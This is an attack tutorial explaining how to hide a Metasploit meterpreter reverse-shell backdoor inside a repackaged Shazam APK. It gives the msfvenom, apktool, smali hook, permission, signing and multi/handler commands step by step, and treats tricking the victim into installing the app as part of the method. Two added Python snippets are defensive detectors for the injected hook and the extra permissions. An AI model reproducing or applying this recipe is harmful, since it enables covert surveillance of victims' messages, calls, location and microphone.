This article is all about planting a backdoor on an Android device, manually. While there are automated tools like AndroRat or Spade, we’re going to show you how to create a backdoor APK by hand.
The goal here is to get the backdoor APK installed on the victim’s device without them knowing. Naturally, the victim isn’t going to install an APK that doesn’t seem useful. So, the trick is to embed the backdoor in a regular, functional APK that the victim wants to install.
Imagine you’re guiding someone to install a regular app. That’s the approach you need to take.
In today’s exercise, we’ll walk through how an attacker can maliciously plant a backdoor in an APK. When the victim installs this APK and runs the app, a meterpreter session is established on the attacker’s PC through a reverse connection.
Remember, the victim must run the app for this to work.
Let’s dive in and get started!
The practice proceeds through the steps below.
Step 1. Create Payload APK file (using msfvenom)
Step 2. Download normal APK file
Step 3. Decompiling APK (Both Payload APK & Normal APK)
Step 4. Copy payload (from Payload directory to normal APK directory…)
Step 5. Register hooking (in the onCreate smali code of the activity used as LAUNCHER in the normal APK…)
Step 6. Add permissions to Manifest.xml file of normal APK
Step 7. APK recompilation
Step 8. Keysigning
1. Hands-On
The practice environment is as follows.
| Division | Attacker | Victim |
| --- | --- | --- |
| IP address | 192.168.0.64 | 192.168.0.14 |
| OS | Kali Linux 2016.1 | Android 4.4.2 |
| Tools used | Metasploit; apktool (APK compile/decompile tool); keytool (Android key generation tool); jarsigner (keysigning tool) | none |
Step 1. Create Payload APK file
Create a meterpreter payload by running the command below in the directory you want to work in.
My working directory is ~/Hack/Android.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.64 LPORT=4444 -o meterpreter.apk
-p : payload settings option
-o: Specifies the file name to be created
The meterpreter payload apk file was created successfully with the name meterpreter.apk.
However, since this payload was generated with msfvenom alone, without encoding or obfuscation, it may well be detected by an AV (antivirus) program.
Step 2. Download the normal APK file
You need a normal apk file that will hide the meterpreter backdoor payload created in Step 1.
Find a site where you can download the apk file through Google.
Usually, searching for "<name of the apk you want> apk download" turns up several sites, so the file is easy to obtain.
Personally, I searched for and downloaded Shazam 6.4.0 from a site called apkmirror.
(For reference, I initially downloaded it from a site called apkpure, but errors kept occurring when I decompiled it with apktool, possibly because that apk file was malformed.)
Shazam is a free music streaming app.
I moved the downloaded Shazam 6.4.0 apk file (com.shazam.android_6.4.0-160415-604002_minAPI16….(nodpi).apk) to my working directory using the mv command.
Because the file name was long, I renamed it to shazam_6.4.0.apk.
The file was moved normally as shown in the screenshot below.
Step 3. Decompile APK
Now decompile shazam_6.4.0.apk and meterpreter.apk using apktool, which is installed by default in Kali Linux.
# apktool d -f -o original shazam_6.4.0.apk
# apktool d -f -o payload meterpreter.apk
The apktool version I used is v2.2.1-dirty, as shown below. Take a moment to review the available options.
Then decompile the two apk files.
Decompilation completed successfully, and new original and payload directories have been created as shown below.
Step 4. Copy payload
Using the command below, copy the entire metasploit directory from the decompiled meterpreter.apk tree (payload/smali/com/) into the decompiled normal apk tree (original/smali/com/).
# cp -r payload/smali/com/metasploit original/smali/com
As you can see, a metasploit directory has been created.
Inside the metasploit directory is a directory called stage, which contains the files shown in the screenshot below.
The file used in this exercise is Payload.smali, boxed in red.
MainBroadcastReceiver.smali and MainService.smali are run in the background as a service when the Android device boots.
They are used to implement a backdoor that starts automatically; the details will be covered in the next post.
Step 5. Register hooking
Using your favorite text editor, open the AndroidManifest.xml file in the directory where the normal apk file (shazam) was decompiled and find the path and name of the activity to hook.
# gedit original/AndroidManifest.xml
Use the search function to find the text .MAIN or .LAUNCHER; hooking this activity ensures that the backdoor runs whenever the app is launched.
The underlined part in the screenshot below, that is, the activity set in <activity android:name=...> (com.shazam.android.activities.SplashActivity), is the activity to hook.
Now replace each dot (.) in com.shazam.android.activities.SplashActivity with a slash (/), add the .smali extension, and open the activity file in a text editor.
# gedit original/smali/com/shazam/android/activities/SplashActivity.smali
When the activity's smali code opens, search for the following text:
;->onCreate(Landroid/os/Bundle;)V
The line immediately following that line is where we will register our hook.
Add the text below there and save.
Be careful to use the class path that matches where the payload was copied in Step 4 (the path below is that of the Payload class copied in Step 4).
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
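From the defender's side, the injection above leaves a recognisable trace: a static call in the launcher activity's onCreate that hands the Activity (p0, a Context) to a class outside the app's own package. The following added example (not from the original post) scans apktool-style smali text for exactly that pattern; the smali excerpt, the package prefix com/example/app and the stager prefix list are constructed for the example.

```python
import re

# Constructed smali excerpt of a launcher activity after the injection described
# in Step 5 (made up for this example; not taken from a real app).
SAMPLE_SMALI = """\
.class public Lcom/example/app/SplashActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1

    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    const v0, 0x7f030000

    invoke-virtual {p0, v0}, Lcom/example/app/SplashActivity;->setContentView(I)V

    return-void
.end method
"""

# onCreate(Bundle) method header, and a static call that passes p0 (the Activity,
# i.e. a Context) to some class's method taking a single Context argument.
METHOD_RE = re.compile(r"^\.method\b.*\bonCreate\(Landroid/os/Bundle;\)V", re.M)
INVOKE_RE = re.compile(
    r"invoke-static\s*\{p0\},\s*L([\w/$]+);->(\w+)\(Landroid/content/Context;\)V"
)
KNOWN_STAGER_PREFIXES = ("com/metasploit/stage/",)  # class path used in this post


def find_context_hooks(smali: str, app_package_prefix: str):
    """Return (class, method, reason) for each static call inside onCreate that
    hands the activity's Context to a class outside the app's own package."""
    findings = []
    for header in METHOD_RE.finditer(smali):
        end = smali.find(".end method", header.end())
        body = smali[header.end():end if end != -1 else len(smali)]
        for call in INVOKE_RE.finditer(body):
            cls, method = call.group(1), call.group(2)
            if cls.startswith(app_package_prefix):
                continue  # the app calling its own code is normal
            reason = ("known Metasploit stager" if cls.startswith(KNOWN_STAGER_PREFIXES)
                      else "foreign class receives Context in onCreate")
            findings.append((cls, method, reason))
    return findings
```

Run it over every .smali file under the launcher activity's package in an apktool output directory; a hit pointing at a class that is not part of the vendor's code base is the thing to investigate.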
Step 6. Add permissions
Open the AndroidManifest.xml file in the directory where the normal apk file was decompiled and add the permissions you need.
# gedit original/AndroidManifest.xml
At this time, check for duplicates with the originally added permissions to prevent duplicate registration.
The permissions I added are listed below.
If you want to see more permission types, check the Android developer site.
Permissions registered in the AndroidManifest.xml file are displayed when the user installs the apk file.
The average user does not even read the permissions displayed at this point; nobody likes bothersome things~
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
Permissions have been added as shown in the screenshot below. Once you have added permissions, simply save and close the file.
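Because the added permissions land in the manifest, a repackaged APK can be caught by diffing its decoded AndroidManifest.xml against the vendor's build. The added example below (not from the original post) does that with the standard library; both manifests, the package name com.example.player and the recognised-permission sets are constructed for the example, and a misspelled name is included because hand-edited manifests tend to carry them.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS  # ElementTree form of android:name

# Runtime ("dangerous") permissions from the list in Step 6; their appearance in
# an update of an app that never needed them is the signal worth alerting on.
DANGEROUS = {
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.READ_SMS", "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.RECORD_AUDIO",
    "android.permission.CALL_PHONE", "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS",
}
# Permissions this script treats as ordinary; names outside both sets are reported
# as unrecognised (a small allow-list chosen for this example).
ORDINARY = {"android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE",
            "android.permission.CHANGE_WIFI_STATE", "android.permission.WAKE_LOCK"}

# Constructed manifests (package name made up): the vendor build and a repackaged
# copy that gained permissions, including a misspelled one.
REFERENCE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.player">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>"""
SUSPECT_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.player">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
</manifest>"""


def permissions(manifest_xml: str) -> set:
    """Set of android:name values of all <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR) for el in root.iter("uses-permission")}


def permission_delta(reference_xml: str, suspect_xml: str):
    """Permissions present only in the suspect manifest, split into dangerous,
    ordinary and unrecognised names (each returned as a sorted list)."""
    added = permissions(suspect_xml) - permissions(reference_xml)
    return (sorted(p for p in added if p in DANGEROUS),
            sorted(p for p in added if p in ORDINARY),
            sorted(p for p in added if p not in DANGEROUS and p not in ORDINARY))
```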
Step 7. Recompile APK
Now that the backdoor has been planted, recompile the tree into an apk file, again with apktool, using the command below.
# apktool b original/
As shown in the screenshot below, when recompilation completes successfully a new dist directory is created under the original directory, containing the new apk file.
At this point I ran into the following error:
Invalid register: v17. Must be between v0 and v15, inclusive.
Only registers v0 through v15 may be used here, and the error occurs because a higher register is referenced. This presumably happens when the .locals value in the smali code of the activity being hooked (step 3) exceeds 15. A fundamental fix has not been found yet; in some cases the error does not occur if you download and work with an older version of the normal apk file.
Step 8. Keysigning
The apk file must be signed before it can be installed on an Android device.
Therefore, first create a keystore with which to sign the newly compiled apk file (skip this if one already exists!).
You can create it through Eclipse, but here we will use a tool called keytool.
To create a keystore with keytool, run the command below.
# keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -validity 9999
-keystore: keystore name, set to debug.keystore
-storepass: keystore password, set to android
-alias: key alias, set to androiddebugkey
-keypass: key password, set to android
-validity: validity period in days, set to 9999
Once the keystore exists, sign the apk with the jarsigner tool.
Note that when running the command below you must supply the values you set when creating the keystore.
# jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg SHA1withDSA [apk file name] androiddebugkey
All work is done.
Now, the victim is made to install and run the apk file on his Android device using social engineering techniques or any other method.
All you have to do is use Metasploit on the attacker’s PC (Kali Linux) and wait for the victim’s Reverse Connection.
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.64
lhost => 192.168.0.64
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
When the victim installs and runs the apk file, a Meterpreter session opens as shown in the screenshot below.
In my case, the session was intermittently disconnected even though the app was running normally on the victim device.
<End>